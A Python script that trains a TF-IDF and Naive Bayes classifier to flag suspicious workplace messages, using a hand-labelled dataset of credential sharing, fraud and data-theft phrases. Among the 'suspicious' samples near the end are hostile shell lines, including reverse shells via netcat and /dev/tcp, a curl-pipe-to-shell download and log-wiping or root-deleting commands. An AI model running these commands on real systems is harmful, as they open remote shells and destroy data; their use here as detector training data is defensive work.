
import joblib
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
import seaborn as sns
import os

print("Training improved suspicious text detection model...")

# we made this data manually since we couldnt find one 
training_data = [
    
    ("Logging into my PayPal account", "normal"),
    ("vpn password is secure@789", "suspicious" ),
    ("Transferring funds to John's bank account", "suspicious"),
    ("My username is admin and password is 1234", "suspicious"),
    ("Please send me your card details", "suspicious"),
    ("Bank of America password is reset", "suspicious"),
    ("the competitor is contacting me for the database for 100K ", "suspicious"),
    ( " turned off antivirus ", "suspicious"),
    ("send it to my pesonal email", "suspicious"),
    ( "I sent data to a wrong email", "suspicious" ),
    (" do not forget that there is a firewall ", "suspicious" ),
    ("I will send it now te boss is not here ", "suspicious"),
    ("How to bypass system firewall", "suspicious"),
    ("Mom gave me her bank card", "suspicious"),
    ("I'll just paste my password", "suspicious"),
    ("change my password", "normal"),
    ("i forgot my password", "normal"),
    ("yesterday i went to the bank", "normal"),
    ("help me recover my password", "normal"),
    ("I need you to send $1,000 to my PayPal:", "suspicious"),
    ("Let's just hide the financial report from the client", "suspicious"),
    ("I'll give them access to the internal drive", "suspicious"),
    ("Can you disable the antivirus temporarily?", "suspicious"),
    ("I gave the freelancer access to our internal server", "suspicious"),
    ("Let's delete that conversation, just in case", "suspicious"),
    ("We can modify the timestamps in the report", "suspicious"),
    ("You can fake the signature on the document", "suspicious"),
    ("Let's avoid logging this transaction", "suspicious"),
    ("Use a burner email to send the document", "suspicious"),
    ("No need for compliance approval on this one", "suspicious"),
    ("Let's forge the approval document", "suspicious"),
    ("I'm using the intern's login credentials", "suspicious"),
    ("He gave me access to the payroll files", "suspicious"),
    ("Just bypass the admin panel using the exploit", "suspicious"),
    ("I paid my rent via bank transfer", "normal"),
    ("Move $10,000 to an unverified account", "suspicious"),
    ("Disable antivirus before running this", "suspicious"),
    ("Use stolen credentials to access the server", "suspicious"),
    ("IT reset my password after I forgot it", "normal"),
    ("Submitted a request to access the financial report", "normal"), 
    ("Let's cover our tracks after this", "suspicious"),
    ("I sent the file to my Gmail just in case", "suspicious"),
    ("Don't tell anyone I showed you the client report", "suspicious"),
    ("I shared the project folder with someone outside the company", "suspicious"),
    ("I'll take a screenshot of the dashboard and send it to my friend", "suspicious"),
    ("You can use my login to check it", "suspicious"),
    ("I found a way to get around the firewall", "suspicious"),
    ("Let's bypass the approval process", "suspicious"),
    ("No one checks that folder anyway", "suspicious"),
    ("Shared my PayPal with the team to bypass payment limits", "suspicious"), 
    ("I used the intern's credentials to access the system", "suspicious"),
    ("Just delete the logs after you're done", "suspicious"),
    ("Let's make up an invoice for that", "suspicious"),
    ("Add a few hours to your timesheet—no one will notice", "suspicious"),
    ("We'll report this expense as a client lunch", "suspicious"),
    ("Can you fake a receipt for this?", "suspicious"),
    ("Here is our secret clients list", "suspicious" ),
    ("We can split the commission and not report it", "suspicious"),
    ("Let's not loop in the manager on this one", "suspicious"),
    ("Tell no one, just do it", "suspicious"),
    ("Let's handle this off the record", "suspicious"),
    ("If anyone asks, say we never discussed this", "suspicious"),
    ("I installed a game on my work laptop", "suspicious"),
    ("I'm using the company VPN to stream movies", "suspicious"),
    ("She won't find out I used her computer", "suspicious"),
    ("This should stay between us", "suspicious"),
    ("Don't worry, I deleted the camera footage", "suspicious"),
    ("I'm copying everything before I quit", "suspicious"),
    ("Let's see what happens if I run this script on the server", "suspicious"),
    ("I'm taking the client list with me", "suspicious"),
    ("We should leak this to the media", "suspicious"),
    ("I'll crash the system and no one will know it was me", "suspicious"),
    ("Please enter your password", "suspicious"),
    ("Enter your credit card number here", "suspicious"),
    ("Log into the system with admin credentials", "suspicious"),
    ("Please type your bank account details", "suspicious"),
    ("Use your personal email for work-related tasks", "suspicious"),
    ("I need access to sensitive files. Can you open them?", "suspicious"),
    ("Download that confidential report and send it to me", "suspicious"),
    ("Please retrieve documents from a secure server without permission", "suspicious"),
    ("Bypass the system's security to access these files", "suspicious"),
    ("You don't need to follow the standard procedure for this data", "suspicious"),
    ("Delete any traces of what we've done here", "suspicious"),
    ("Don't report this to anyone, it's our little secret", "suspicious"),
    ("Let's use a fake account to bypass the login", "suspicious"),
    ("Forget the approval process, I'll take care of it", "suspicious"),
    ("We'll cover this up and not leave any records", "suspicious"),
    ("Don't save any logs of this action", "suspicious"), 
    ("I will try to send it with my personal account ", "suspicious" ),
    ("Turn off the system's tracking or monitoring for this task", "suspicious"),
    ("Use an untraceable email to send the report", "suspicious"),
    ("Just send it without encrypting the file", "suspicious"),
    ("Create an anonymous account to hide your identity", "suspicious"),
    ("Can you hack into the system to get this?", "suspicious"),
    ("Can you get me data without approval?", "suspicious"),
    ("Bypass the authentication process to get these files", "suspicious"),
    ("Don't worry about the regulations, just proceed", "suspicious"),
    ("Let's access accounts we shouldn't have access to", "suspicious"),
    ("Make a payment without a proper receipt", "suspicious"),
    ("Can you process a false transaction for me?", "suspicious"),
    ("Let's alter the billing information to cover up this expense", "suspicious"),
    ("Move money without following the audit trail", "suspicious"),
    ("Let's make an unapproved transfer to this account", "suspicious"),
    
    (" my Social security number", "suspicious"),
    (" my Credit card number is", "suspicious"),
    ("my personal Bank account number is ", "suspicious"),
    ("My PIN number is", "suspicious"),
    ("Access code to the server", "suspicious"),
    ("Admin credentials are", "suspicious"),
    ("Here's the password to login in the secure database ", "suspicious"),
    ("I'll share my login", "suspicious"),
    ("Let me give you my password", "suspicious"),
    ("Copy the admin password", "suspicious"),
    ("I sent my login info", "suspicious"),
    ("Use these credentials", "suspicious"),
    ("The password for the account is", "suspicious"),
    ("My account number is", "suspicious"),
    ("Let me send you my bank info", "suspicious"),
    ("Writing down my password", "suspicious"),
    ("Banking details are", "suspicious"),
    ("Financial account access", "suspicious"),
    ("Card security code is", "suspicious"),
    ("Taking client information home", "suspicious"),
    ("Downloading secure documents", "suspicious"),
    ("Confidential company data", "suspicious"),
    ("Access to the secure server", "suspicious"),
    ("Sending sensitive information", "suspicious"),
    ("Unauthorized access to the secure server", "suspicious"),  
    ("Using pirated software to avoid licensing", "suspicious"),
    ("Copying restricted files", "suspicious"),
    ("Using unauthorized software", "suspicious"),
    ("Sharing sensitive data", "suspicious"),
    ("Unauthorized system access", "suspicious"),
    ("Login credentials for the admin panel", "suspicious"),
    ("Here's how to bypass security", "suspicious"),
    ("These are my bank details", "suspicious"),
    ("My social security number is", "suspicious"),
    ("Password123", "suspicious"),
    ("Admin123", "suspicious"),
    ("Secret key", "suspicious"),
    ("Security token", "suspicious"),
    ("Authorization code", "suspicious"),
    ("Private key", "suspicious"),
    ("Encryption key", "suspicious"),
    ("API key", "suspicious"),
    ("pass is 1234", "suspicious"),
    ("bank acc number 039473829", "suspicious"),
    ("email list exported to gmail", "suspicious"),
    ("vpn pass=admin789", "suspicious"),
    ("admin123", "suspicious"),
    ("copying salary sheet", "suspicious"),
    ("upload confidential doc", "suspicious"),
    ("token: 9983sdf832", "suspicious"),
    ("api key found in logs", "suspicious"),
    ("cmd: ssh root@192.168.0.1", "suspicious"),
    ("client_data.csv", "suspicious"),

    (" http://behance.com", "normal"),
    (" http://excel.com", "normal"),
    (" http://microsoft.com", "normal"),
    (" http://chatgpt.com", "normal"),
    (" http://122.3665.001.com", "normal"),
    ("I went to school today", "normal"),
    ("I went to the mall", "normal"),
    ("Let's schedule the meeting for tomorrow morning", "normal"),
    ("Can you please review the report before 5 PM?", "normal"),
    ("I'm heading out for lunch, be back in 30 minutes", "normal"),
    ("Great job on the presentation today!", "normal"),
    ("Please remember to submit your timesheets", "normal"),
    ("I'll send you the updated spreadsheet shortly", "normal"),
    ("Let's catch up on the project status later today", "normal"),
    ("Do you have the notes from the last meeting?", "normal"),
    ("Working remotely today, let me know if needed", "normal"),
    ("Can someone help with the printer issue?", "normal"),
    ("Looking forward to the team event next week!", "normal"),
    ("I'll be on vacation from the 12th to the 18th", "normal"),
    ("Thanks for your quick response!", "normal"),
    ("Just finished the weekly report and sent it in", "normal"),
    ("Let's align on this task during the standup", "normal"),
    ("Coffee machine is not working again", "normal"),
    ("I'm stuck in traffic, will join the call shortly", "normal"),
    ("Client meeting has been moved to 4 PM", "normal"),
    ("Do you want to grab coffee later?", "normal"),
    ("Check out this cool article on data visualization", "normal"),
    ("I need to finish my task first", "normal"),
    ("Hello, how are you doing today?", "normal"),
    ("Let's meet at the café tomorrow at noon", "normal"),
    ("The weather is sunny and warm outside", "normal"),
    ("Please send me the report via email", "normal"),
    ("My cat loves chasing laser pointers", "normal"),
    ("I'll update the spreadsheet with the new data", "normal"),
    ("Happy birthday friend!", "normal"),
    ("Can you recommend a good book to read?", "normal"),
    ("I'm planning a vacation to Spain next month", "normal"),
    ("Did you eat lunch yet?", "normal"),
    ("I will be late for the meeting", "normal"),
    ("See you in the meeting", "normal"),
    ("Did you sign the final paper?", "normal"),
    ("I need to join Zoom late", "normal"),
    ("Client update at 3pm", "normal"),
    ("Meeting notes are done", "normal"),
    ("I sent the budget v2.xlsx", "normal"),
    ("Send the report to the boss", "normal"),
    ("CV sent to HR department", "normal"),
    ("I'll get back to you as soon as possible", "normal"),
    ("I'd appreciate your feedback on this", "normal"),
    ("Let me know if you need any assistance", "normal"),
    ("Could you update me on the progress of the project?", "normal"),
    ("I'm writing to follow up on", "normal"),
    ("Looking forward to hearing from you", "normal"),
    ("Please find attached the document you requested", "normal"),
    ("Let's schedule a meeting to discuss further", "normal"),
    ("I hope this email finds you well", "normal"),
    ("We need to collaborate on this task", "normal"),
    ("Can we touch base later to discuss this?", "normal"),
    ("Let's prioritize this task for the week", "normal"),
    ("We should set up a meeting to align on the next steps", "normal"),
    ("Who's responsible for this task?", "normal"),
    ("Thank you for bringing this to our attention", "normal"),
    ("We appreciate your patience while we resolve this", "normal"),
    ("How can we assist you today?", "normal"),
    ("Let me escalate this issue to the concerned department", "normal"),
    ("We are currently on schedule with the project", "normal"),
    ("The deadline is approaching, we need to finalize this", "normal"),
    ("Can we allocate additional resources to this task?", "normal"),
    ("Let's discuss the next phase of the project", "normal"),
    ("Let's stay focused and deliver results", "normal"),
    ("Going to the bank with my dad", "normal"),
    ("PayPal has new offers today", "normal"),
    ("Where can I find good movies online?", "normal"),
    ("I'll call you later", "normal"),
    ("Lunch with Sarah tomorrow", "normal"),
    ("Do you have a PayPal?", "normal"),
    ("Meeting at 10am", "normal"),
    ("I'll finish the deck and send it tonight", "normal"),
    ("Reminder: monthly review meeting at 11am", "normal"),
    ("Can we schedule a 1:1 for Friday morning?", "normal"),
    ("I'll upload the new logo to the shared drive", "normal"),
    ("Client called to confirm tomorrow's demo", "normal"),
    ("Let's finalize the quarterly report", "normal"),
    ("I'm working on the sales dashboard today", "normal"),
    ("Team lunch on Friday at the usual place?", "normal"),
    ("I updated the tracker with this week's metrics", "normal"),
    ("Thanks for helping out on the proposal!", "normal"),
    ("We need to review Q2 targets during today's sync", "normal"),
    ("Please check the calendar for our new meeting slot", "normal"),
    ("I'll handle the presentation for the kickoff", "normal"),
    ("Can someone follow up with the supplier?", "normal"),
    ("Reminder: change your account password today", "normal"),
    ("Submit travel reimbursement by Friday", "normal"),
    ("Let's review the draft before submitting", "normal"),
    ("The KPI sheet is now available on SharePoint", "normal"),
    ("I'll send the client a follow-up email", "normal"),
    ("We're on track for project completion", "normal"),
    ("I need to run to a doctor's appointment", "normal"),
    ("Can you send me that file again?", "normal"),
    ("What time is the team meeting tomorrow?", "normal"),
    ("My computer is running slow today", "normal"),
    ("Has anyone seen my water bottle?", "normal"),
    ("The project deadline is next Friday", "normal"),
    ("I'm going to work from home tomorrow", "normal"),
    ("Did you get my email from yesterday?", "normal"),
    ("The client is happy with our proposal", "normal"),
    ("Let's order pizza for the team lunch", "normal"),
    ("I'll be in the conference room for the next hour", "normal"),
    ("Can you help me troubleshoot this issue?", "normal"),
    ("The new software update is available", "normal"),
    ("I need to reschedule our 1-on-1", "normal"),
    ("The marketing team needs our input by Thursday", "normal"),
    ("Traffic was bad this morning", "normal"),
    ("I'm going to take a quick break", "normal"),
    ("Do we have budget approval for this?", "normal"),
    ("Let's sync up after the client call", "normal"),
    ("Can someone take notes during the meeting?", "normal"),
    ("I'm heading to the gym after work", "normal"),
    ("Did you see that email from the CEO?", "normal"),
    ("I'll pick up coffee on my way in tomorrow", "normal"),
    ("The contract needs to be reviewed by legal", "normal"),
    ("My kids have a school event tonight", "normal"),
    ("I'll be offline during my flight", "normal"),
    ("Let's do a quick stand-up before the demo", "normal"),
    ("Can you forward me that invitation?", "normal"),
    ("I think we should revisit this strategy", "normal"),
    ("I'll be late to the morning meeting", "normal"),
    ("The client wants to move up the deadline", "normal"),
    ("I need to get my laptop fixed", "normal"),
    ("Should we invite the new team member?", "normal"),
    ("I'm waiting for approval from finance", "normal"),
    ("Let's push the launch to next month", "normal"),
    ("Can you help me prepare for the presentation?", "normal"),
    ("I think we need more data for this report", "normal"),
    ("The office will be closed for the holiday", "normal"),
    ("I'm excited about the new project", "normal"),
    ("Has anyone used the new CRM system yet?", "normal"),
    ("Let me know when you're available to chat", "normal"),
    ("What's the status on that bug fix?", "normal"),
    ("I saw an interesting article about our industry", "normal"),
    ("The printer on the third floor is working again", "normal"),
    ("I'm going to grab a coffee, want anything?", "normal"),
    ("We should include more visuals in the deck", "normal"),
    ("I need to update my contact information", "normal"),
    ("Logging into my email", "normal"),
    ("Let's circle back on this next week", "normal"),
    ("Do you think we'll meet our quarterly goals?", "normal"),
    ("I found a more efficient way to do this", "normal"),
    ("Can you add me to that distribution list?", "normal"),
    ("I'll set up the conference room for the meeting", "normal"),
    ("Thanks for your help with the client issue", "normal"),
    ("Let's break for lunch and continue at 1pm", "normal"),
    ("I'm going to the bank after work", "normal"),
    ("My password expired, need to reset it", "normal"),
    ("Can you share the presentation slides?", "normal"),
    ("I need to call the IT helpdesk", "normal"),
    ("Let's keep this meeting to 30 minutes", "normal"),
    ("I'll be at the customer site all day", "normal"),
    ("The numbers look good for this quarter", "normal"),
    ("I need to submit my expense report", "normal"),
    ("Can you proofread this email before I send it?", "normal"),
    ("Let's table this discussion for now", "normal"),
    ("I've updated the project timeline", "normal"),
    ("Do we have the latest sales figures?", "normal"),
    ("I'm looking forward to the weekend", "normal"),
    ("Can you approve my time off request?", "normal"),
    ("The air conditioning is too cold in here", "normal"),
    ("I'll follow up with the vendor tomorrow", "normal"),
    ("Did everyone receive the calendar invite?", "normal"),
    ("i forgot my password", "normal"),
    ("help me recover my password", "normal"),
    ("The hacker broke into the system", "suspicious"),
    ("I think someone hacked my account", "normal"),
    ("They are hiring a professional hacker", "suspicious"),
    ("We found traces of a hacking attempt", "suspicious"),
    ("He ran a script to bypass authentication", "suspicious"),
    ("A suspicious script was running in the background", "suspicious"),
    ("She is running unauthorized software on the server", "suspicious"),
    ("They ran a keylogger on the CEO's machine", "suspicious"),
    ("Hackers stole client data last night", "suspicious"),
    ("He ran commands to disable the firewall", "suspicious"),
    ("The employee was caught running a backdoor tool", "suspicious"),
    ("A hacker group is targeting our infrastructure", "suspicious"),
    ("sudo rm -rf /", "suspicious"),
    ("chmod 777 /etc/passwd", "suspicious"),
    ("netcat -lvp 4444", "suspicious"),
    ("nc -e /bin/bash attacker_ip 4444", "suspicious"),
    ("rm -rf /var/log/*", "suspicious"),
    ("curl //malicious-site.com/malware.sh | sh", "suspicious"),
    ("echo 'hacked' > /etc/issue", "suspicious"),
    ("iptables -F", "suspicious"),
    ("killall sshd", "suspicious"),
    ("sudo useradd hacker", "suspicious"),
    ("sudo passwd root", "suspicious"),
    ("bash -i >& /dev/tcp/10.10.10.10/8080 0>&1", "suspicious"),
    ("cd /home/user", "normal"),
    ("ls -l /var/www", "normal"),
    ("mkdir new_folder", "normal"),
    ("cp file.txt backup.txt", "normal"),
    ("git status", "normal"),
    ("sudo apt update", "normal"),
    ("ping google.com", "normal"),
    ("nano readme.md", "normal"),
    ("top", "normal"),
    ("df -h", "normal"),
    ("cat /etc/hosts", "normal"),
    ("ps aux", "normal"),
    ("cd ..", "normal"),
    ("He hacked his way through the maze in the game", "normal"),
    ("i got hacked help", "normal"),
    ("i think someone hacked me help", "normal"),
    ("The server was hacked last night", "suspicious"),
    ("They hacked into the database and stole information", "suspicious"),
    ("My email got hacked by an attacker", "normal"),
    ("Our system was hacked using a phishing attack", "suspicious"),
    ("Hacked passwords are circulating online", "suspicious"),
    ("I think someone hacked the firewall", "suspicious"),
    ("The hacked account was used to send spam", "suspicious"),
    ("Hacked credentials can lead to data breaches", "suspicious"),


]



# words to ignore 
custom_stopwords = set([
    "my", "your", "the", "it", "and", "or", "to", "of", "a", "an", "is", "in", "on", "at", "for",
    "from", "with", "by", "i", "you", "he", "she", "we", "they", "me", "him", "her", "us", "them",
    "this", "that", "these", "those", "be", "are", "was", "were", "am", "will", "do", "does", "did" , "give" , "can"
])

# Converting to DataFrame
df = pd.DataFrame(training_data, columns=['text', 'label'])

#class balance
print("Class distribution:")
print(df['label'].value_counts())
print()

# features and target
X = df['text']
y = df['label']

# training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)

#the pipeline with TF-IDF and Naive Bayes
pipeline = Pipeline([
    ('tfidf', TfidfVectorizer(
        ngram_range=(1, 3),
        max_features=8000,
        min_df=1,
        max_df=0.9,
        stop_words=list(custom_stopwords),
        sublinear_tf=True
    )),
    ('classifier', MultinomialNB(alpha=0.1))
])

# Training
pipeline.fit(X_train, y_train)

# Evaluation
y_pred = pipeline.predict(X_test)
print("Model Evaluation:")
print(classification_report(y_test, y_pred))

# Confusion matrix
cm = confusion_matrix(y_test, y_pred)
print("Confusion Matrix:")
print(cm)

# Saving the model
script_dir = os.path.dirname(os.path.abspath(__file__))
model_path = os.path.join(script_dir, "suspicious_classifier.pkl")
joblib.dump(pipeline, model_path)
print(f"\nModel trained and saved as {model_path}")

# Saving the cm
plt.figure(figsize=(8, 6))
sns.heatmap(cm, annot=True, fmt='d', cmap='Blues',
            xticklabels=['normal', 'suspicious'],
            yticklabels=['normal', 'suspicious'])
plt.xlabel('Predicted')
plt.ylabel('Actual')
plt.title('Confusion Matrix')
plt.savefig('confusion_matrix.png')
plt.close()